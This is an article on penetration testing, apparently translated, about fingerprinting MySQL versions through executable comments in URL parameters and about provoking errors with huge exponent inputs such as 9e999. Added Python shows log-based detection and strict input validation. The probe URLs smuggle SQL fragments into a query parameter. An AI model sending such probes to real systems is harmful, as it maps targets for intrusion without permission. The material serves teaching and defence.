For the purposes of this example we assume MySQL, since it appears to be the most common database behind web applications; similar techniques apply to other products. Every SQL dialect has unique features of its own. MySQL allows comments inside SQL statements:
SELECT * FROM tbl /* foo */
MySQL also has an extension that lets MySQL-specific code be placed inside such a comment:
SELECT /*! SQL_NO_CACHE */ * FROM tbl
Every database other than MySQL treats the above as an ordinary comment. MySQL looks inside the comment and may change its behaviour accordingly. The comment can also be made conditional on the server version; the following is executed only if MySQL is version 4.0.0 or higher:
SELECT /*!40000 SQL_NO_CACHE */ * FROM tbl
This is extremely useful to a penetration tester for discovering, blind, which database is in use and which version:
Try:
http://foo/web.php?table=38 - we get the normal screen
http://foo/web.php?table=38/*%20s*/ - we get the normal screen
http://foo/web.php?table=38/*!%20s*/ - we get an error screen, because of the syntax error inside the comment: MySQL is in use
http://foo/web.php?table=38/*!30000%20s*/ - we get an error screen, MySQL is at least 3.x.x
http://foo/web.php?table=38/*!40000%20s*/ - we get an error screen, MySQL is at least 4.x.x
http://foo/web.php?table=38/*!50000%20s*/ - we get the normal screen, MySQL is below 5.x.x
http://foo/web.php?table=38/*!40020%20s*/ - we get the normal screen, MySQL is below 4.0.20
http://foo/web.php?table=38/*!40017%20s*/ - we get an error screen, MySQL is at least 4.0.17
http://foo/web.php?table=38/*!40018%20s*/ - we get the normal screen, MySQL is below 4.0.18
We can conclude that the site runs MySQL 4.0.17.
This is useful information, because we then know which exploits and vulnerabilities are worth trying: the 3.x.x, 4.x.x and 5.x.x series of MySQL each offer different functions.
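As an added defensive illustration, not part of the original text, here is a small Python scanner that spots the probe pattern above in web-server access logs: it extracts the query parameters, flags MySQL executable comments (/*! ...) together with the 5-digit version gate inside them, and reports clients that send several different gates in a row, which is the signature of a version walk. It also encodes the MySQL rule the probes rely on: the body of /*!NNNNN ... */ runs only when the server version, written as Mmmrr (4.0.17 becomes 40017), is at least NNNNN. The log lines, the host name "foo" and the client addresses are constructed for the example.

```python
import re
from collections import defaultdict
from typing import Optional
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (hypothetical host "foo", hypothetical client IPs).
# The query strings mirror the probe sequence described in the text; %20 decodes to a space.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2004:10:00:00 +0000] "GET /web.php?table=38 HTTP/1.0" 200 512
10.0.0.5 - - [01/Jan/2004:10:00:01 +0000] "GET /web.php?table=38/*%20s*/ HTTP/1.0" 200 512
10.0.0.5 - - [01/Jan/2004:10:00:02 +0000] "GET /web.php?table=38/*!%20s*/ HTTP/1.0" 500 128
10.0.0.5 - - [01/Jan/2004:10:00:03 +0000] "GET /web.php?table=38/*!40017%20s*/ HTTP/1.0" 500 128
10.0.0.5 - - [01/Jan/2004:10:00:04 +0000] "GET /web.php?table=38/*!40018%20s*/ HTTP/1.0" 200 512
10.0.0.9 - - [01/Jan/2004:10:00:05 +0000] "GET /web.php?table=39 HTTP/1.0" 200 520
"""

# The pieces of the common log format we need: client address, request target and status code.
LOG_RE = re.compile(r'^(?P<ip>\S+) .*"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# MySQL executable comment opener, optionally followed by a 5-digit version gate (Mmmrr).
COND_COMMENT_RE = re.compile(r'/\*!(?P<ver>\d{5})?')


def version_number(server_version: tuple) -> int:
    """Encode (major, minor, release) the way MySQL compares version gates: 4.0.17 -> 40017."""
    major, minor, release = server_version
    return major * 10000 + minor * 100 + release


def conditional_comment_executes(server_version: tuple, gate: Optional[int]) -> bool:
    """MySQL rule: /*! body */ runs on every MySQL server; /*!NNNNN body */ runs only when
    the server's version number is >= NNNNN. Every other database sees a plain comment."""
    return gate is None or version_number(server_version) >= gate


def scan_log(log_text: str) -> list:
    """Return one finding per query parameter that carries a SQL comment."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        # parse_qsl percent-decodes the values, so %20 has already become a space here.
        for name, value in parse_qsl(query, keep_blank_values=True):
            cc = COND_COMMENT_RE.search(value)
            if cc:
                kind = "mysql_conditional_comment"
                gate = int(cc.group("ver")) if cc.group("ver") else None
            elif "/*" in value:
                kind, gate = "sql_comment", None
            else:
                continue
            findings.append({"ip": m.group("ip"), "param": name, "value": value,
                             "kind": kind, "gate": gate, "status": int(m.group("status"))})
    return findings


def fingerprinting_clients(findings: list, min_distinct_gates: int = 2) -> list:
    """Clients that sent several different version gates: the signature of a version walk."""
    gates_by_ip = defaultdict(set)
    for f in findings:
        if f["gate"] is not None:
            gates_by_ip[f["ip"]].add(f["gate"])
    return sorted(ip for ip, gates in gates_by_ip.items() if len(gates) >= min_distinct_gates)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f"{f['ip']} {f['param']}={f['value']!r} -> {f['kind']} gate={f['gate']} status={f['status']}")
    print("suspected fingerprinting from:", fingerprinting_clients(found))
    # Why the walk works: on a 4.0.17 server the gate 40017 executes and 40018 is skipped.
    print(conditional_comment_executes((4, 0, 17), 40017), conditional_comment_executes((4, 0, 17), 40018))
```

Correlating the gate values with the status codes is what turns a single odd request into a finding: the attacker's information comes from the flip between an error page and a normal page, so the same pair is visible to whoever reads the logs. A front-end that answers such requests with a uniform error page, rather than letting database syntax errors surface, removes the signal the probes depend on.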
An additional, independent trick. Most systems do not take it into account. Look at the default behaviour of the MySQL database engine:
mysql> select 9e0;
+-----+
| 9e0 |
+-----+
|   9 |
+-----+
1 row in set (0.02 sec)
mysql> select 9e2;
+-----+
| 9e2 |
+-----+
| 900 |
+-----+
1 row in set (0.00 sec)
Most language interpreters try to guess what type their input is. Such input is typically checked against a maximum width and then passed on. This way we can, for example, send 9e9 to the database on the back end. PHP users are often advised to use is_int($_GET['foo']). That does not stop this technique: the value looks numeric and is only 3 characters long, yet it may still take your database server down.
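The failure mode in the paragraph above, as an added Python example that is not from the original article: a lenient "looks numeric" check (Python's float() parse stands in for PHP's is_numeric(), which likewise accepts "9e9" and "9e999") is compared with a strict whitelist that accepts only bounded, plain decimal digits (in PHP, ctype_digit() or filter_var() with FILTER_VALIDATE_INT behave that way). The point to notice is that 9e999 overflows to infinity after parsing, so a three-character width limit does nothing to bound the magnitude that reaches the database. The sample values and the assumed id range are constructed.

```python
import math
import re

# Strict whitelist: plain decimal digits only, no sign, no whitespace, no exponent, at most 10 digits.
STRICT_INT_RE = re.compile(r"0|[1-9][0-9]{0,9}")
MAX_ID = 2**31 - 1  # assumed range of the id column; adjust to the real schema


def looks_numeric(value: str) -> bool:
    """Lenient check in the spirit of PHP's is_numeric(): float() accepts "9e9", " 38", "-1", "9e999"."""
    try:
        float(value)
        return True
    except ValueError:
        return False


def parse_id(value: str, max_value: int = MAX_ID) -> int:
    """Strict parse: returns the integer, or raises ValueError for anything that is not a bounded,
    plain decimal integer. This is the check that should gate a value before it reaches SQL."""
    if not STRICT_INT_RE.fullmatch(value):
        raise ValueError(f"not a plain decimal integer: {value!r}")
    n = int(value)
    if n > max_value:
        raise ValueError(f"out of range: {n}")
    return n


def classify(value: str) -> dict:
    """Compare what the lenient check lets through with what the strict parser accepts."""
    result = {"value": value, "length": len(value), "lenient_ok": looks_numeric(value),
              "strict_ok": False, "magnitude": None}
    if result["lenient_ok"]:
        f = float(value)
        # 9e999 overflows to infinity: three characters, unbounded magnitude.
        result["magnitude"] = "inf" if math.isinf(f) else f
    try:
        parse_id(value)
        result["strict_ok"] = True
    except ValueError:
        pass
    return result


def lenient_only(values) -> list:
    """Inputs that pass the lenient check but fail the strict one: the dangerous gap."""
    return [v for v in values if looks_numeric(v) and not classify(v)["strict_ok"]]


# Constructed sample inputs: the value from the text, the oversized exponents, and a few near misses.
SAMPLES = ["38", "9e9", "9e999", "1e3", "-1", " 38", "0x26", "38/*!40000 s*/", "4294967296"]

if __name__ == "__main__":
    for v in SAMPLES:
        r = classify(v)
        print(f"{v!r:>18} len={r['length']:<2} lenient={r['lenient_ok']!s:<5} "
              f"strict={r['strict_ok']!s:<5} magnitude={r['magnitude']}")
    print("passes lenient, fails strict:", lenient_only(SAMPLES))
```

The length column makes the width-check argument concrete: "9e999" is shorter than "4294967296", yet the former parses to infinity while the latter is at least a finite number the range check can reject. Width and "is it a number" are both the wrong question; the right one is whether the value is exactly the shape the column expects.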
Tonu once had a penetration test in which it was almost impossible to get any error message out of the system. Eventually Tonu sent 9e999 to one of the inputs; the response took an unusually long time, about 30 seconds, and came back with a message resembling "PHP pause in something.inc". Anyone who does penetration testing knows how important any information about the system internals is. With nothing more than an extremely large number, Tonu had extracted an internal file name from a company system that otherwise gave nothing away.